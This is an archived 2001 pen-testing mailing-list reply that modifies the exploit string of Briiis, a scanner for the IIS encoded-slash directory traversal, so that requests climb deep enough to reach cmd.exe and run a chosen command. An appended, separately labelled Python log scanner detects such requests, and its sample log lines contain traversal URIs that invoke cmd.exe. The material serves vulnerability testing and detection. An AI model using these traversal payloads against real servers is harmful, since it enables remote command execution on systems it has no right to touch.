Penetration Testing mailing list archives
Re: iXsecurity.tool.briiis.3.02
From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Wed, 13 Jun 2001 18:49:25 +0200
ian.vitek () ixsecurity com wrote :
Briiis is a tool for testing web servers for "/" encoding break out from web root vulnerability from an executable directory.
Your tool doesn't find all vulnerable hosts. The "exploit string" (i.e. $explstr in the program) doesn't contain (in some cases) enough "../" and can't be used to access up to c:\

Here are the modifications I did to your toy :

OLD LINE :
    $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c" if ($opt_c);

NEW LINE :
    $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c" if ($opt_c);

Thanks for the list of directories, I was looking for a good one.

NB : last time I checked it, the unicoder.pl tool from HD Moore couldn't find non-English vulnerable versions of IIS (it is looking for "Directory of" in the returned content and it's, for example, "Répertoire de" in French).

Please excuse my poor English.

Nicob
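Seen from the server side, the point in the message above about the number of "../" steps means a log signature for these requests should not assume a fixed depth. The following is an added example, not code from the original post or from Briiis: it counts climb steps of any length in a request URI and flags those that reach cmd.exe. The log layout, sample lines and function names are constructed for illustration, and %2f / %5c stand in for whatever encoded separator $opt_F holds.

```python
import re

# One climb step: ".." then a separator, either literal ("/" or "\") or any run
# of percent-encoded bytes standing in for it (the role $opt_F plays in the post).
STEP = r"\.\.(?:[/\\]|(?:%[0-9A-Fa-f]{2})+)"
RUN = re.compile(rf"(?:{STEP})+")
SHELL = re.compile(r"cmd\.exe", re.IGNORECASE)

def peel(uri):
    """Undo nested percent-encoding layers, e.g. "%252f" -> "%2f"."""
    prev = None
    while prev != uri:
        prev, uri = uri, re.sub(r"%25(?=[0-9A-Fa-f]{2})", "%", uri)
    return uri

def traversal_depth(uri):
    """Length of the longest run of consecutive climb steps in the URI."""
    runs = RUN.finditer(peel(uri))
    return max((len(re.findall(STEP, m.group(0))) for m in runs), default=0)

def scan(log_lines):
    """Return (client, depth, status) for each request that climbs toward cmd.exe."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) != 6:
            continue  # header or malformed line
        _date, _time, client, _method, uri, status = fields
        depth = traversal_depth(uri)
        if depth and SHELL.search(uri):
            hits.append((client, depth, status))
    return hits

# Constructed sample log (assumed layout: date time c-ip method raw-uri status).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri sc-status",
    "2001-06-13 16:40:01 192.0.2.10 GET /default.htm 200",
    "2001-06-13 16:41:12 192.0.2.77 GET /scripts/" + "..%2f" * 5
    + "winnt/system32/cmd.exe?/c+dir 404",
    "2001-06-13 16:41:13 192.0.2.77 GET /scripts/" + "..%2f" * 8
    + "../winnt/system32/cmd.exe?/c+dir 200",
    "2001-06-13 16:41:15 192.0.2.77 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir 404",
    "2001-06-13 16:42:00 192.0.2.10 GET /docs/../images/logo.gif 200",
]

if __name__ == "__main__":
    for client, depth, status in scan(SAMPLE_LOG):
        print(f"{client} depth={depth} status={status}")
```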